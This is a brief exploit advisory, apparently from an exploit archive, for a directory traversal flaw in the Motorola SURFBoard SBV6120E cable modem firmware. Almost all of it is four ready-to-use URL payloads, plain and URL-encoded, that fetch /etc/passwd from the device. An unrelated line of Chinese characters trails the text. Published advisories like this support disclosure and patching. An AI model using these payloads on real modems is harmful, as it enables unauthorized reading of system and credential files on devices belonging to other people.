# Exploit Title: Motorola SURFBoard Cable Modem Directory Traversal # Date: 2010.06.03 # Author: S2 Crew [Hungary] # Software Link: - # Version: Model name: SBV6120E, Firmware Name: SBV6X2X-1.0.0.5-SCM-02-SHPC # Tested on: ^ # CVE: - # Code : The following urls get back the /etc/passwd file from the modem: http://[IP]///etc/passwd <http://[ip]///etc/passwd> http://[IP]/../../etc/passwd http://[IP]/..%2f..%2fetc/passwd <http://[ip]/..%2f..%2fetc/passwd> http://[IP]/%2e%2e/%2e%2e/etc/passwd
体验盒子